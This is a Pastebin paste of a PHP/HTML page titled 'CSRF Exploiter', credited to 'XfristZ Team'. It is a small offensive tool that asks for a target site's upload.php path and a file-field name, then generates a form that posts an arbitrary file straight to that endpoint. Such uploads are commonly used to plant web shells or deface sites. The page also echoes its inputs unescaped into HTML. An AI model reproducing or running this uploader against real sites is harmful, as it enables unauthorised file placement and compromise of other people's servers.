Advertisement
jefrialdi33

csrf.php

Apr 23rd, 2019
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.68 KB | None | 0 0
  1. <html>
  2. <head>
  3. <link href="https://fonts.googleapis.com/css?family=Rajdhani:700" rel="stylesheet">
  4. <link href="https://fonts.googleapis.com/css?family=Bungee|Keania+One|Simonetta:900" rel="stylesheet">
  5. <link href="" rel="stylesheet" type="text/css">
  6. <title>CSRF Expoiter</title>
  7. <style>
  8. body{
  9. font-family: 'Rajdhani', sans-serif;
  10. background-image: url("");
  11. color:#8001f1;
  12. background-attachment:fixed;
  13. background-repeat:no-repeat;
  14. background-position:center;
  15. background-color: black;
  16. -webkit-background-size: 100% 100%;
  17. }
  18. #content tr:hover{
  19. background-color: #BD29FF;
  20. text-shadow:1px 0px 0px #000;
  21. }
  22. #content .first{
  23. background-color: #BD29FF;
  24. font-weight: bold;
  25. }
  26. h1{
  27. color:red;
  28. font-family: "Bungee", cursive;
  29. -webkit-text-stroke: 0px #5ddcfc;
  30. }
  31. table{
  32. border: 1px red solid;
  33. background-color:black;
  34. border-radius:4px;
  35. }
  36. border{
  37. border: 1px #9435dd solid;
  38. }
  39. a{
  40. color:red;
  41. text-decoration: none;
  42. }
  43. select,textarea{
  44. font-family: 'Rajdhani', sans-serif;
  45. color:#8001f1;
  46. border: 1px red solid;
  47. background-color:black;
  48. padding:5px 8px;
  49. -moz-border-radius: 0px;
  50. -webkit-border-radius:0px;
  51. border-radius:0px;
  52. }
  53. input{
  54. color:#8001f1;
  55. font-family: 'Rajdhani', sans-serif;
  56. border: 1px red solid;
  57. background-color:black;
  58. padding:5px 25px;
  59. -moz-border-radius: 0px;
  60. border-radius:0px;
  61. }
  62. </style>
  63. </head>
  64. <body>
  65. <center>
  66. <img src="http://oi68.tinypic.com/29kqlb6.jpg" width="450" height="450"></center>
  67. <br>
  68. <table align="center" border="1px" width="500">
  69. <tr class="first">
  70. <td><center>&#9798; CSRF EXPLOITER ONLINE &#9798;</peller></center></td></tr>
  71. <tr><td><form method="post">
  72. Site Target :<input type="text" name="url" size="70" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  73. POST File : <input type="text" name="pf" size="70" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><hr color="red">
  74. <center><input type="submit" name="d" value="Kunci"></center>
  75. <hr color="red">
  76. </form>
  77. <center>
  78. <?php
  79. $url = $_POST['url'];
  80. $pf = $_POST['pf'];
  81. $d = $_POST['d'];
  82. if($d) {
  83. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  84. }
  85. ?>
  86. </td></tr></table></center>
  87. </form>
  88. <Br><br><br><Br><br><br><Br><br><br>
  89. <center><footer>
  90. <ul>
  91. <a href="#"><font size="5">[ Kontak Admin ]</a>
  92. <a href="#">[ Download File ]</a>
  93. <a href="#">[About ]</a>
  94. </ul>
  95. </footer>
  96. </center>
  97. <center><font size="3">copyright &copy; 2019 - XfristZ Team</font></center>
  98. </body>
  99. </body>
  100. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement